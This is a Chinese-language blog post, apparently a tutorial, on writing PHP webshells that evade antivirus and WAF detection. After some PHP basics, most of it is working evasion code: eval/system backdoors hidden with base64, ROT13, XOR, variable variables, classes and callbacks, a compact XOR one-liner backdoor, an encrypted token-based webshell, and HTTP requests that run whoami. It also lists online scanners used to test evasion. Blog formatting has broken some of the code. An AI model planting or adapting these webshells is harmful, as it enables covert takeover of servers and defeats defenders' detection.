我们只要做一件事:免杀
一, 什么是webshell
(本篇文章大部分摘自AabyssZG师傅的博客)
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为asp、jsp和php。
比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。
简而言之就是银行保险库里的经过精心伪装的老鼠洞
二, 一些php基础,毕竟PHP是世界上最好的语言:)
以下分别是.=和+=赋值,数组,数组嵌套,数组嵌套利用,compact()函数(跟py里的字典很像),&与xor运算符,一些常量,php特性,php标记,回调类型函数,字符串处理类函数,命令执行类函数, 文件写入函数,异常处理类函数,数据库连接函数,PHP过滤器
1 | //1. |
一些常用的回调函数
- array_map()
函数将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新的值的数组
例子:将函数作用到数组中的每个值上,每个值都乘以本身,并返回带有新的值的数组:
1 | function myfunction($v) |
- register_shutdown_function()
函数是来注册一个会在PHP中止时执行的函数
因为PHP中止的情况有三种:
- 执行完成
- exit/die导致的中止
- 发生致命错误中止
例子: 后面的after并没有输出,即 exit 或者是 die 方法导致提前中止
1 | function test() |
- array_walk()
函数对数组中的每个元素应用用户自定义函数
1 | function myfunction($value,$key,$p) |
- array_filter()
函数用回调函数过滤数组中的元素
该函数把输入数组中的每个键值传给回调函数:如果回调函数返回 true,则把输入数组中的当前键值返回给结果数组(数组键名保持不变)1
2
3
4
5
6
7
8
9function test_odd($var)
{
return($var & 1);
}
$a1=array("a","b",2,3,4);
print_r(array_filter($a1,"test_odd"));
//Array ( [3] => 3 )即arrayfilter函数会遍历数组a1中的每个元素,并将其传递给test_odd函数进行判断。最后,array_filter函数会返回所有使test_odd函数返回值为true的元素所构成的新数组。 - foreach()
方法用于调用数组的每个元素,并将元素传递给回调函数
foreach 语法结构提供了遍历数组的简单方式。foreach 仅能够应用于数组和对象,如果尝试应用于其他数据类型的变量,或者未初始化的变量将发出错误信息。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15$arr = array(1,2,3,4);
//用foreach来处理$arr
foreach($arr as $k=>$v) {
$arr[$k] = 2 * $v;
}
print_r($arr);
/*
Array
(
[0] => 2
[1] => 4
[2] => 6
[3] => 8
)
*/ - isset()
函数用于检测变量是否已设置并且非 NULL
isset 在php中用来判断变量是否声明,该函数返回布尔类型的值,即true/false
isset 只能用于变量,因为传递任何其它参数都将造成解析错误1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24$var = '';
// 结果为 TRUE,所以后边的文本将被打印出来。
if (isset($var)) {
echo "变量已设置。" . PHP_EOL;
}
// 在后边的例子中,我们将使用 var_dump 输出 isset() 的返回值。
// the return value of isset().
$a = "test";
$b = "anothertest";
var_dump(isset($a)); // TRUE
var_dump(isset($a, $b)); // TRUE
unset ($a);
var_dump(isset($a)); // FALSE
var_dump(isset($a, $b)); // FALSE
$foo = NULL;
var_dump(isset($foo)); // FALSE
一些字符串处理类函数
- 自己定义
组成字符串的拼接方式,比如:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22function confusion($a){
$s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
$tmp = "";
while ($a>10) {
$tmp .= $s[$a%10];
$a = $a/10;
}
return $tmp.$s[$a];
}
echo confusion(976534); //sysTem(高危函数)
//以下字符串处理类的函数做参考
trim() //从字符串的两端删除空白字符和其他预定义字符
ucfirst() //把字符串中的首字符转换为大写
ucwords() //把字符串中每个单词的首字符转换为大写
strtoupper() //把字符串转换为大写
strtolower() //把字符串转换为小写
strtr() //转换字符串中特定的字符
substr_replace() //把字符串的一部分替换为另一个字符串
substr() //返回字符串的一部分
strtok() //把字符串分割为更小的字符串
str_rot13() //对字符串执行 ROT13 编码 - substr()
函数返回字符串的一部分
例子:相当于截取字段固定长度和开头的内容1
2
3echo substr("D://system//451232.php", -10, 6)."<br>"; //451232
echo substr("AabyssTeam", 0, 6)."<br>"; //Aabyss - intval()
获取变量的整数值
1 | int intval(var,base) //var指要转换成 integer 的数量值,base指转化所使用的进制 |
pack()
函数把数据装入一个二进制字符串
简单来说,就是将指定编码的数字转成字符串1
2
3
4
5
6
7
8
9
10
11echo pack("C3",80,72,80); //ASCII编码转换为PHP
echo pack("H*",4161627973735465616d); //16进制编码转换为AabyssTeam
```
其他参数请参考菜鸟教程: https://www.runoob.com/php/func-misc-pack.html
### 命令执行函数
1. eval()
函数把字符串按照 PHP 代码来计算,即执行PHP代码
```php
@eval($_POST['111']);system()
函数的主要功能是在系统权限允许的情况下,执行系统命令(Windows系统和Linux系统均可执行)exec()
函数可以执行系统命令,但它不会直接输出结果,而是将执行的结果保存到数组中1
2
3exec( 'ls' , $result );
print_r($result); //Array ( [0] => index.php )shell_exec()
函数可以执行系统命令,但不会直接输出执行的结果,而是返回一个字符串类型的变量来存储系统命令的执行结果1
2echo shell_exec('ls'); //index.php
passthru()
函数可以执行系统命令并将执行结果输出到页面中
与 system() 函数不同的是,它支持二进制的数据,使用时直接在参数中传递字符串类型的系统命令即可1
2passthru('ls'); //index.php
popen()
popen() 函数可以执行系统命令,但不会输出执行的结果,而是返回一个资源类型的变量用来存储系统命令的执行结果
故需要配合 fread() 函数来读取命令的执行结果1
2
3$result = popen('ls', 'r'); //参数1:执行ls命令 参数2:字符串类型
echo fread($result, 100); //参数1:上面生成的资源 参数2:读取100个字节反引号``
反引号可以执行系统命令但不会输出结果,而是返回一个字符串类型的变量用来存储系统命令的执行结果可单独使用,也可配合其他命令执行函数使用来绕过参数中的滤条件1
2
3echo `ls`; //index.php
$_GET[1]`;//短webshell `
文件写入类函数
- fwrite()
函数是用于写入文件,如果成功执行,则返回写入的字节数;失败,则返回 FALSE
例子:将 Hello World. Testing! 写入 test.txt1
2
3
4$file = fopen("test.txt","w");
echo fwrite($file,"Hello World. Testing!"); //21
fclose($file); - file_put_contents()
函数把一个字符串写入文件中
如果文件不存在,将创建一个文件
1 | $file = 'sites.txt'; |
异常处理类函数
- Exception 类
是php所有异常的基类,这个类包含如下方法:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48__construct //异常构造函数
getMessage //获取异常消息内容
getPrevious //返回异常链中的前一个异常,如果不存在则返回null值
getCode //获取异常代码
getFile //获取发生异常的程序文件名称
getLine //获取发生异常的代码在文件中的行号
getTrace //获取异常追踪信息,其返回值是一个数组
getTraceAsString //获取字符串类型的异常追踪信息
// 创建一个有异常处理的函数
function checkNum($number)
{
if($number>1)
{
throw new Exception("变量值必须小于等于 1");
}
return true;
}
// 在 try 块 触发异常
try
{
checkNum(2);
// 如果抛出异常,以下文本不会输出
echo '如果输出该内容,说明 $number 变量';
}
// 捕获异常
catch(Exception $e)
{
echo 'Message: ' .$e->getMessage() . "<br>" ;
echo "错误信息:" . $e->getMessage() . "<br>";
echo "错误码:" . $e->getCode() . "<br>";
echo "错误文件:" . $e->getFile() . "<br>";
echo "错误行数:" . $e->getLine() . "<br>";
echo "前一个异常:" . $e->getPrevious() . "<br>";
echo "异常追踪信息:";
echo "" . print_r($e->getTrace(), true) . "<br>";
echo "报错内容输出完毕";
}
/*Message: 变量值必须小于等于 1
错误信息:变量值必须小于等于 1
错误码:0
错误文件:D:\phpstudy_pro\WWW\AabyssZG\error.php
错误行数:7
前一个异常:
异常追踪信息:Array ( [0] => Array ( [file] => D:\phpstudy_pro\WWW\AabyssZG\error.php [line] => 14 [function] => checkNum [args] => Array ( [0] => 2 ) ) )
报错内容输出完毕
...
数据库连接函数
- Sqlite数据库
配合我上面写的 file_put_contents() 文件写入函数,先写入本地Sqlite文件然后读取敏感内容1
2
3
4
5
6
7
8
9$path = "111ZG.db";
$db = new PDO("sqlite:" . $path);
//连接数据库后查询敏感关键词
$sql_stmt = $db->prepare('select * from test where name="system"');
$sql_stmt->execute();
//提权敏感关键词并进行拼接
$f = substr($sql_stmt->queryString, -7, 6);
$f($_GET['111']); //system($_GET['111']); - MySQL数据库
这里使用 MySQLi() 这个函数,其实PHP有很多MySQL连接函数,可自行尝试
然后通过这个函数,连接公网数据库(只要目标能出网),即可连接并获得敏感字符拼接到php中1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19function coon($sql) {
$mysqli = new MySQLi("localhost", "test", "test123", "test");
//默认的 MySQL的类,其属性与方法见手册
if ($mysqli - > connect_error) {
//connect_error为属性,报错
die("数据库连接失败:".$mysqli - > connect_errno. "--".$mysqli - > connect_error);
// connect_errno:错误编号
}
$mysqli - > select_db("test"); //选择数据库
// 返回值 $res 为资源类型(获取到结果的资源类型)
$res = $mysqli - > query($sql) or die($mysqli - > error);
//释放结果集,关闭连接
$mysqli - > close();
}
$sql = "select * from test where name LIKE 'system'";
$arr = coon($sql);
$res = array("data" => $arr);
echo json_encode($res);
php过滤器
免杀测试
牧云Webshell检测引擎:
微步在线云沙箱:
河马WebShell在线查杀:
百度WEBDIR+在线查杀
大名鼎鼎的VirusTotal:
渊龙Sec团队导航(上面啥都有): https://dh.aabyss.cn/
长亭牧云查杀: https://stack.chaitin.com/security-challenge/webshell/index
阿里云恶意文件检测平台:https://ti.aliyun.com/#/webshell
阿里伏魔引擎: https://xz.aliyun.com/zues
VirusTotal: https://www.virustotal.com/gui/home/upload
微步在线云沙箱: https://s.threatbook.com/
河马WebShell查杀: https://n.shellpub.com/
百度WEBDIR+: https://scanner.baidu.com/
D盾: http://www.d99net.net/
网站安全狗: http://free.safedog.cn/website_safedog.html
免杀思路
1 分析统计内容(传统):可以结合字符黑名单和函数黑名单或者其他特征列表(例如代码片段的Hash特征表),之后通过对文件信息熵、元字符、特殊字符串频率等统计方式发现WebShell。
2 语义分析(AST):把代码转换成AST语法树,之后可以对一些函数进行调试追踪,那些混淆或者变形过的webshell基本都能被检测到。但是对于PHP这种动态特性很多的语言,检测就比较吃力,AST是无法了解语义的。
3 机器学习(AI):这种方法需要大量的样本数据,通过一些AI自动学习模型,总结归类Webshell的特征库,最终去检测Webshell。
4 动态监控(沙箱):采用RASP方式,一旦检测到有对应脚本运行,就去监控(Hook)里边一些危险函数,一但存在调用过程将会立刻阻止。这种阻止效果是实时的,这种方法应该是效果最好的,但是成本十分高昂。
最激动人心的部分,bypass
编码绕过(推荐嵌套)
base64
1
2
3
4
5
$f = base64_decode("YX____Nz__ZX__J0"); //解密后为assert高危函数
$f($_POST[aabyss]); //assert($_POST[aabyss]);ASCII码
1
2
3
4
5
6
//ASCII编码解密后为assert高危函数
$f = chr(98-1).chr(116-1).chr(116-1).chr(103-2).chr(112+2).chr(110+6);
$f($_POST['aabyss']); //assert($_POST['aabyss']);ROT13编码
1
2
3$f = str_rot13('flfgrz'); //解密后为system高危函数
$f($_POST['aabyss']); //system($_POST['aabyss']);Gzip压缩加密
1 | /*Protected by AabyssZG*/ |
字符串混淆处理绕过
自定义函数混淆字符串
通过对上面所说两部分敏感内容的拼接、混淆以及变换,来绕过WAF的检测逻辑,如下:1
2
3
4
5
6
7
8
9
10
11
12function confusion($a){
$s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
$tmp = "";
while ($a>10) {
$tmp .= $s[$a%10];
$a = $a/10;
}
return $tmp.$s[$a];
}
$f = confusion(976534); //sysTem(高危函数)
$f($_POST['aabyss']); //sysTem($_POST['aabyss']);自定义函数+文件名混淆
同,可以配合文件名玩出一些花活,我们建一个PHP名字为 976534.php:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25function confusion($a){
$s = ['a','t','s', 'y', 'm', 'e', '/'];
$tmp = "";
while ($a>10) {
$tmp .= $s[$a%10];
$a = $a/10;
}
return $tmp.$s[$a];
}
$f = confusion(intval(substr(__FILE__, -10, 6))); //sysTem(高危函数)
//__FILE__为976534.php
//substr(__FILE__, -10, 6)即从文件名中提取出976534
//confusion(intval(976534))即输出了sysTem(高危函数),拼接即可
$f($_POST['aabyss']); //sysTem($_POST['aabyss']);
```
首先先读取文件名,从 976534.php 文件名中提取出 976534 ,然后带入函数中就成功返还 sysTem 高危函数了,可以配合其他姿势一起使用,达成免杀效果
3. 特殊字符串
主要是通过一些特殊的字符串,来干扰到杀软的正则判断并执行恶意代码(各种回车、换行、null和空白字符等)
```php
$f = 'hello';
$$z = $_POST['aabyss'];
eval(``.$hello);
生成新文件绕过
原理也很简单,该PHP本身没法执行命令,但是运行后可以在同目录混淆写入一个WebShell,也是可以进行免杀的:
1 | $hahaha = strtr("abatme","me","em"); //$hahaha = abatem |
1 | //(1)普通使用: |
- array_map()
回顾一下array_map()函数吧,简单来说就是将数组里每个值进行自定义操作,再把新的数组返回
1 | function fun() { |
可变变量绕过
简单例子
1
2
3
4
5
6
7
8
9$f = 'hello'; //变量名为f,变量值为Hello
$$f = 'AabyssZG'; //变量名为Hello(也就是$f的值),值为AabyssZG
echo $hello; //输出AabyssZG
//利用
$f ='hello';
$$f = $_POST['aabyss'];
eval($hello); //eval($_POST['aabyss']);数组+变量引用混淆
上文提到,可以通过 compact 创建一个包含变量名和它们的值的数组
那就可以用 compact 创建一个包含恶意函数和内容的数组,再引用出来拼接成语句即可
1 | $z = "system"; //配合其他姿势,将system高危函数传给z |
根据学到的内容,可以发现传入数组,函数内容被替换是不会影响数组中的内容的
于是先用变量 zhixin 来引用变量 z 然后通过 compact 创建为数组,接下来再将变量 z 附上新的内容 wahaha ,传统的WAF追踪变量的内容时候,就会让查杀引擎误以为数组中的值不是 system 而是 wahaha ,从而达到WebShell免杀
数组绕过
先将高危函数部分存储在数组中,等到时机成熟后提取出来进行拼接
一维数组
1
2
3
4
5
6$f = substr_replace("systxx","em",4); //system(高危函数)
$z = array($array = array('a'=>$f($_GET['aabyss'])));
var_dump($z);
//Array ( [0] => Array ( [a] => assert($_GET['aabyss']) ) )二维数组
1
2
3
4$f = substr_replace("systxx","em",4); //system(高危函数)
$z = array($arrayName = ($arrayName = ($arrayName = array('a' => $f($_POST['aabyss'])))));
var_dump($z);
类绕过 (跟反序列化联动,各种魔术方法)
通过自定义类或者使用已知的类,将恶意代码放入对应的类中进行执行
- 单类
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32class Test
{
public $_1='';
function __destruct(){
system("$this->a");
}
}
$_2 = new Test;
$_2->$_1 = $_POST['aabyss'];
```
2. 多类
```php
class Test1
{
public $b ='';
function post(){
return $_POST['aabyss'];
}
}
class Test2 extends Test1
{
public $code = null;
function __construct(){
$code = parent::post();
system($code);
}
}
$fff = new Test2;
$zzz = new Test1;
嵌套运算绕过
主要通过各种嵌套、异或以及运算来拼装出来想要的函数,再利用PHP允许动态函数执行的特点,拼接处高危函数名,如 system ,然后动态执行恶意代码之即可
- 异或
^ 为异或运算符,在PHP中两个变量进行异或时,会将字符串转换成二进制再进行异或运算,运算完再将结果从二进制转换成了字符串这里的话,可以参考国光大佬的Python脚本生成异或结果,然后来替换即可:python3 xxx.py > results.txt1
2
3$f = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0'); //system高危函数
$f($_POST['aabyss']);1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36import string
from urllib.parse import quote
keys = list(range(65)) + list(range(91,97)) + list(range(123,127))
results = []
for i in keys:
for j in keys:
asscii_number = i^j
if (asscii_number >= 65 and asscii_number <= 90) or (asscii_number >= 97 and asscii_number <= 122):
if i < 32 and j < 32:
temp = (f'{chr(asscii_number)} = ascii:{i} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i < 32 and j >=32:
temp = (f'{chr(asscii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
elif i >= 32 and j < 32:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ ascii{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
else:
temp = (f'{chr(asscii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(asscii_number))
results.append(temp)
results.sort(key=lambda x:x[1], reverse=False)
for low_case in string.ascii_lowercase:
for result in results:
if low_case in result:
print(result[0])
for upper_case in string.ascii_uppercase:
for result in results:
if upper_case in result:
print(result[0]) - 嵌套运算
1
2
3
4
5
6$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("JE8wTzAwMD0iU0VCb1d4VGJ2SGhRTnFqeW5JUk1jbWxBS1lrWnVmVkpVQ2llYUxkc3J0Z3dGWER6cEdPUFdMY3NrZXpxUnJBVUtCU2hQREdZTUZOT25FYmp0d1pwYVZRZEh5Z0NJdnhUSmZYdW9pbWw3N3QvbFg5VEhyT0tWRlpTSGk4eE1pQVRIazVGcWh4b21UMG5sdTQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
//phpinfo
//NSS 有一题类似的,微盾解密
传参绕过
- Base64传参
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56$decrpt = $_REQUEST['a'];
$decrps = $_REQUEST['b'];
$arrs = explode("|", $decrpt)[1];
$arrs = explode("|", base64_decode($arrs));
$arrt = explode("|", $decrps)[1];
$arrt = explode("|", base64_decode($arrt)); call_user_func($arrs[0],$arrt[0]);
//
//a=c3lzdGVt //system的base64加密
//b=d2hvYW1p //whoami的base64加密
```
2. 函数构造传参
可以用一些定义函数的函数来进行传参绕过,比如使用 register_tick_function() 这个函数
```php
register_tick_function ( callable $function [, mixed $... ] ) : bool
$f = $_REQUEST['f'];
declare(ticks=1);
register_tick_function ($f, $_REQUEST['aabyss']);
```
### 自定义函数绕过
读取已定义函数
获取某个类的全部已定义的常量,不管可见性如何定义
>public ReflectionClass::getConstants(void) : array
```php
class Test
{
const a = 'Sy';
const b = 'st';
const c = 'em';
public function __construct(){
}
}
$para1;
$para2;
$reflector = new ReflectionClass('Test');
for ($i=97; $i <= 99; $i++) {
$para1 = $reflector->getConstant(chr($i));
$para2.=$para1;
}
foreach (array('_POST','_GET') as $_request) {
foreach ($$_request as $_key=>$_value) {
$$_key= $_value;
}
}
$para2($_value);
读取字符串绕过
重点还是放在高危函数上,通过读取各种东西来获得对应字符串
1 | //读取注释 |
多姿势配合免杀 (样例)
重在思路
这个样例使用了异或+变换参数的手法,成功规避了正则匹配式,具有实战意义1
2$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]); ~
这时候,就可以执行GET传参:?_=system&__=whoami 来执行whoami命令
拆开看看 (异或)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15$_='$<>/'^'{{{{'; ~
//即 '$<>/' ^ '{{{{'
//即 "$<>/" 这部分字符串与后面 "{{{{" 这部分字符串异或
//_GET
//所以整个PHP语句解密后,再将 _ 替换为 a,将 __ 替换为 b,则原PHP转化为:
$_GET['a']($_GET['b'])
//当我们给 a 传 system,给 b 传 whoami,原式就会变成这样
system('whoami');
//assert的(php5)
$_='$<>/'^'{{{{';$___='$+4(/' ^ '{{{{{';@${$_}[_](@${$___}[__]); ~这个样例使用了字符串截取+编解码转换+参数回调的手法,成功规避了正则匹配式,具有实战意义
1 |
|
刚开始传入参数:num=2,Qxi*37yz=6173797374656d282777686f616d6927293b62
第一步:先根据 substr(),从num=2开始截取到倒数第2位,于是 Qxi*37yz 便等于 73797374656d282777686f616d6927293b
第二步:再根据 pack("H*",...),将 Qxi*37yz=73797374656d282777686f616d6927293b 从16进制转为字符串即 system('whoami');
第三步:最后根据 foreach(),将内容返还给原本的值,使得 encode() 函数的输出变量 $post1 为 system('whoami');
第四步:再在 Xt() 函数当中,用 eval() 高危函数执行php语句 system('whoami');,便成功执行系统命令 whoami
微信的 @Elvery 师傅还写了一个直接生成Payload一键传参的Python脚本,师傅们可以参考一下:
1 | import requests |
- 样例三
这个样例使用了异或+编解码转换+参数加解密回调+密钥协商的手法,成功规避了语义分析和正则匹配式,具有实战意义
这个WebShell和冰蝎马等具有相似性,各位师傅不妨可以看看原理:
1 |
|
一共分了三步来执行
首先,这个函数定义了一个函数 set_token() 和一个类 class E,但我们不着急看,我们先看PHP先执行的部分:
1 | //_SESSION 是用于在PHP中存储会话数据的关联数组,通常用于在不同页面之间共享数据。isset函数用于检查变量是否已经被设置,如果变量存在并且有值,返回 true,否则返回 false。 |
所以根据知识点,我们要先给服务器发一个 Token 值,这样就可以进入if语句,服务器就会生成一个随机的令牌(token)并将其存储在会话(session)中,并通过HTTP头部返回给客户端
但 Token 只需要获取一次就行了,因为服务器生成并返还令牌(token)后,会存在会话(session)中,简单理解就是服务器的内存当中,后续的使用就不要添加Token 值了
因为如果再获取,令牌(token)又会重新生成,就无法进入else的后续步骤,
1 | $v=$_SERVER['HTTP_X_CSRF_TOKEN']; |
意思就是,从HTTP请求头获取名为 “HTTP_X_CSRF_TOKEN” 的值,并进行Base64解密再讲值重新赋给 $v
接下来我们再来看类 class E :
1 | class E { |
然后看set_token():
1 | function set_token($v,$t) { |
简单来说,函数 set_token($v, $t) 就是一个加密算法,作用是根据输入的两个字符串 $v 和 $t,返回一个新的字符串 $r
该函数采用异或(XOR)操作对两个字符串的每个字符进行逐一处理,并将结果拼接成新的字符串返回
而返回的 $r 变量,最终会传入 @new E($r),进行Base64解密并放入高危函数 eval 内执行
打个比方,假设我们想执行系统命令 whoami,那 $r 变量就应该是 system(‘whoami’); Base64加密后的字符串 c3lzdGVtKCd3aG9hbWknKTsg
而 $r 变量又是 set_token($v, $_SESSION[‘token’]) 的加密结果,看上去很清晰,那目前我们的困境是什么?
那就是我们不知道 $v 应该传什么值!!!我们目前只知道 $t=>$_SESSION[‘token’] 和执行的最终结果 $r=>c3lzdGVtKCd3aG9hbWknKTsg,那我们能不能通过这两个变量获得 $v呢,当然可以
1 |
|
通过编写这么一段代码,调换了一下顺序,就可以通过 $t=>$_SESSION[‘token’] 和 $r=>c3lzdGVtKCd3aG9hbWknKTsg,拿到参数 $v
复现:
- 第一步、密钥协商得到Token
对WebShell进行发包,Token 随便填啥都行
1 | GET /muma.php HTTP/1.1 |
返回包中可以看到服务器生成的 Token 值和 Cookie 值
2. 第二步,得到X-CSRF-TOKEN
假设我们想执行系统命令 whoami,PHP代码就是 system(‘whoami’); ,对其进行Base64加密后的字符串 c3lzdGVtKCd3aG9hbWknKTsg,当然你想执行其他的命令也行
1 | POST /decode.php HTTP/1.1 |
然后通过上文写的解密PHP,通过第一步获得的 Token 值和最终Base64加密后的字符串 c3lzdGVtKCd3aG9hbWknKTsg,拿到得到 X-CSRF-TOKEN
这不是对WebShell发包,而是对上面写的解密PHP decode.php 来进行解密
- 第三步,利用木马成功执行命令
现在已经拿到 X-CSRF-TOKEN 和 Cookie 了,那就直接发包即可1
2
3
4
5
6
7
8
9POST /muma.php HTTP/1.1
Host: test.ctf.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=6g4sgte2t8nnv65u8er5cfdtnq;
X-CSRF-TOKEN: AgEOSQIkN015dlcKVX4MDQNlCV0tNxJe
Content-Length: 0
About this Post
This post is written by void2eye, licensed under CC BY-NC 4.0.